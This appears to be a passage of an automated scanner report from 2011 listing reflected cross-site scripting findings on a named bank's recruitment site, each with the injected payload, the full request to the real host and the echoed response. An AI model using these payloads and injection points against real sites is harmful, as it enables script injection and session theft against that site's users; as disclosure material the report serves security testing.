<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_video_room.php?8a96c"><a>f7d9e3abee=1" />
...[SNIP]...

1.119. http://www.mycreditagricole.jobs/stud_video_room.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3765e"-alert(1)-"e4578547f46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_video_room.php?3765e"-alert(1)-"e4578547f46=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:18 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:18 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
dit Agricole Recruitment Group";
var SharingBaseTitle = "Video room - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_video_room.php?3765e"-alert(1)-"e4578547f46=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.120. http://www.mycreditagricole.jobs/stud_vie.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_vie.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 280fc"><a>4ad8248dca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_vie.php?280fc"><a>4ad8248dca=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:55 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:55 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>VIE - S
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_vie.php?280fc"><a>4ad8248dca=1" />
...[SNIP]...

1.121. http://www.mycreditagricole.jobs/stud_vie.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_vie.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61efe"-alert(1)-"9433513db88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_vie.php?61efe"-alert(1)-"9433513db88=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:22 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:22 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>VIE - S
...[SNIP]...
tudents - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "VIE - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_vie.php?61efe"-alert(1)-"9433513db88=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.122. http://www.mycreditagricole.jobs/video_room.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fb8f"-alert(1)-"83c155fc47a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video_room.php?1fb8f"-alert(1)-"83c155fc47a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:32 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:32 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
ideo room - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Video room - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/video_room.php?1fb8f"-alert(1)-"83c155fc47a=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.123. http://www.mycreditagricole.jobs/video_room.php [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66076"><a>e5b6dfe3ae6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video_room.php?66076"><a>e5b6dfe3ae6=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:13 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:13 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/video_room.php?66076"><a>e5b6dfe3ae6=1" />
...[SNIP]...

Report generated by XSS.CX at Mon Sep 12 10:42:52 GMT-06:00 2011.